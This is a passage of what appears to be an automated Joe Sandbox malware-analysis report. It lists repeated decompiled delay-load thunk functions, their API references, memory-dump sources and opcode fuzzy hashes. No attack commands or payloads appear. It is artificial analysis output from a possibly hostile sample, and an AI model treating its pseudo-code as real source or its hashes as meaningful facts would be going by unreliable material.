				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9be44, 0xec2090); // executed
				goto __eax;
			}

0x00e7de94
0x00e7de9c
0x00e7dea3

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DE9C

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8a481b21d53bc4fdb94fe07b12addebf057ad33155a11bd3036ce9861f7fcdec
Instruction ID: b529c30a01d69dd83e4d0c45da0503f8f41c1a508862d7ebec8a1b1553ebc127
Opcode Fuzzy Hash: 8a481b21d53bc4fdb94fe07b12addebf057ad33155a11bd3036ce9861f7fcdec
Instruction Fuzzy Hash: EAB0128135D1016D310461543E07E76016DC4C4B10330F42FB109F8241DD411C060132

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DEAF Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DEAF() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9be44, 0xec208c); // executed
				goto __eax;
			}

0x00e7de94
0x00e7de9c
0x00e7dea3

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DE9C

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8743bdaa57e51bdc0fddc930e7174ac0e003b250029d2c5e827a6057ac92da81
Instruction ID: 790f8da3dfa9bc27f3136e38c8d4494a3b07e5d2504d84b35adffbc49a894685
Opcode Fuzzy Hash: 8743bdaa57e51bdc0fddc930e7174ac0e003b250029d2c5e827a6057ac92da81
Instruction Fuzzy Hash: F3B0128135D302AD310851443E07D77017CC4C4B10330F41FB508F9241D9801C060132

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DE8A Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DE8A() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9be44, 0xec2088); // executed
				goto __eax;
			}

0x00e7de94
0x00e7de9c
0x00e7dea3

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DE9C

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8d7ef912f2e91419bc1dfcf7a01fba28dd0976b16013a6c18c39e62a268980da
Instruction ID: 3e9161d169294de8616df6bebb327c37f059493ad2ccdbe09b6749d3fd81bcd7
Opcode Fuzzy Hash: 8d7ef912f2e91419bc1dfcf7a01fba28dd0976b16013a6c18c39e62a268980da
Instruction Fuzzy Hash: E6B0128135D3067D320411403E07C77012CC4C0B10330F51FB108F8141D9801C460032

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DF24 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DF24() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9be64, 0xec2174); // executed
				goto __eax;
			}

0x00e7def5
0x00e7defd
0x00e7df04

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DEFD

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3cfb2cecea13f9fdd3bc3c6734861876849802de38bb5bd561101579ffa6b7a7
Instruction ID: dfc19b33b930490268a62fd14a45cf092b5a45e61bdfdfcefc2b684816802a75
Opcode Fuzzy Hash: 3cfb2cecea13f9fdd3bc3c6734861876849802de38bb5bd561101579ffa6b7a7
Instruction Fuzzy Hash: 9EB0128176D201AD354C6145BF03D76017CC4D4F10330F61EB208F4151D6812D030031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DF06 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DF06() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9be64, 0xec2178); // executed
				goto __eax;
			}

0x00e7def5
0x00e7defd
0x00e7df04

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DEFD

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1954da400b8941fca5a96179b33f75a3912bb4fc8b8e673aeb5d7c84753c3e54
Instruction ID: 23cd0a3f7f0ba0eae0096c1a7904285a31a349869c21d6cadef076977e7675ed
Opcode Fuzzy Hash: 1954da400b8941fca5a96179b33f75a3912bb4fc8b8e673aeb5d7c84753c3e54
Instruction Fuzzy Hash: 51B0128176D301AD35886144BE03D76017CC4D4F10331F61EB208F4151D6402C421031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DF1A Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DF1A() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9be64, 0xec2180); // executed
				goto __eax;
			}

0x00e7def5
0x00e7defd
0x00e7df04

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DEFD

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e607346a6d92af65c493772031bd2cfbcdda4b70c77d39fa4e228b6e2c19d1d1
Instruction ID: f62ff25fe98abbdd346cf76113a5893e6c14bbec311efa5edb5a88f0586daf93
Opcode Fuzzy Hash: e607346a6d92af65c493772031bd2cfbcdda4b70c77d39fa4e228b6e2c19d1d1
Instruction Fuzzy Hash: 67B0128176D306BE314861447E43D76016CC4D4B10331F45EF208F4151DA402C020031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DBFA Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DBFA() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9bdc4); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7db5b
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0ca2b55eea30c8a7c33328adaba0f0934e6dd309960933db029f78a73eef11be
Instruction ID: 1138440a38500d40a643d0778dd9eab6f4d3d33e324a359c66ffb6285960b8a1
Opcode Fuzzy Hash: 0ca2b55eea30c8a7c33328adaba0f0934e6dd309960933db029f78a73eef11be
Instruction Fuzzy Hash: 5BA0019A6AD682BC75086291BE46C7A026CC8C8B61332F95EF40AB51D2E9802C466431

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DBDC Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DBDC() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9bdc4); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7db5b
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fc1f271a2aa060947bc0e36b5873da8881a29c0fcc67c81617e0c6c204380a84
Instruction ID: 1138440a38500d40a643d0778dd9eab6f4d3d33e324a359c66ffb6285960b8a1
Opcode Fuzzy Hash: fc1f271a2aa060947bc0e36b5873da8881a29c0fcc67c81617e0c6c204380a84
Instruction Fuzzy Hash: 5BA0019A6AD682BC75086291BE46C7A026CC8C8B61332F95EF40AB51D2E9802C466431

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DB96 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DB96() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9bdc4); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7db5b
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1cfa0777010ab5d2ac9de1598f5a30deea91d99947566e27af773cbb584f178a
Instruction ID: 1138440a38500d40a643d0778dd9eab6f4d3d33e324a359c66ffb6285960b8a1
Opcode Fuzzy Hash: 1cfa0777010ab5d2ac9de1598f5a30deea91d99947566e27af773cbb584f178a
Instruction Fuzzy Hash: 5BA0019A6AD682BC75086291BE46C7A026CC8C8B61332F95EF40AB51D2E9802C466431

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DC40 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DC40() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9bdc4); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7db5b
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 19a0f2cce349a8d87ab4b6075d3ca2cebd32ba2e31dada364659c054ff2ba094
Instruction ID: 1138440a38500d40a643d0778dd9eab6f4d3d33e324a359c66ffb6285960b8a1
Opcode Fuzzy Hash: 19a0f2cce349a8d87ab4b6075d3ca2cebd32ba2e31dada364659c054ff2ba094
Instruction Fuzzy Hash: 5BA0019A6AD682BC75086291BE46C7A026CC8C8B61332F95EF40AB51D2E9802C466431

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DC4A Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DC4A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9bdc4); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7db5b
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0c864cb519aa6dbb87ef410f93d5a9c544e3376abb1e5bb582df714ce1c42702
Instruction ID: 1138440a38500d40a643d0778dd9eab6f4d3d33e324a359c66ffb6285960b8a1
Opcode Fuzzy Hash: 0c864cb519aa6dbb87ef410f93d5a9c544e3376abb1e5bb582df714ce1c42702
Instruction Fuzzy Hash: 5BA0019A6AD682BC75086291BE46C7A026CC8C8B61332F95EF40AB51D2E9802C466431

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DC54 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DC54() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9bdc4); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7db5b
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1777e2114cf3f6f3526ecd3e35e59a565c29f73f5ca6ec290f0d635e9ed8d495
Instruction ID: 1138440a38500d40a643d0778dd9eab6f4d3d33e324a359c66ffb6285960b8a1
Opcode Fuzzy Hash: 1777e2114cf3f6f3526ecd3e35e59a565c29f73f5ca6ec290f0d635e9ed8d495
Instruction Fuzzy Hash: 5BA0019A6AD682BC75086291BE46C7A026CC8C8B61332F95EF40AB51D2E9802C466431

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DC22 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DC22() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9bdc4); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7db5b
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d401f578d48f3393f283aed7414a7abfbe6d3b4071cec3e71d0a4716b4c527a5
Instruction ID: 1138440a38500d40a643d0778dd9eab6f4d3d33e324a359c66ffb6285960b8a1
Opcode Fuzzy Hash: d401f578d48f3393f283aed7414a7abfbe6d3b4071cec3e71d0a4716b4c527a5
Instruction Fuzzy Hash: 5BA0019A6AD682BC75086291BE46C7A026CC8C8B61332F95EF40AB51D2E9802C466431

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DC2C Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DC2C() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9bdc4); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7db5b
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 37c8559ab34b843891baaeea053cc2e4586c9f73095752e5da1d9cb91f2ee79d
Instruction ID: 1138440a38500d40a643d0778dd9eab6f4d3d33e324a359c66ffb6285960b8a1
Opcode Fuzzy Hash: 37c8559ab34b843891baaeea053cc2e4586c9f73095752e5da1d9cb91f2ee79d
Instruction Fuzzy Hash: 5BA0019A6AD682BC75086291BE46C7A026CC8C8B61332F95EF40AB51D2E9802C466431

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DC0E Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E7DC0E() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xe9bdc4); // executed
				E00E7E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00e7db5b
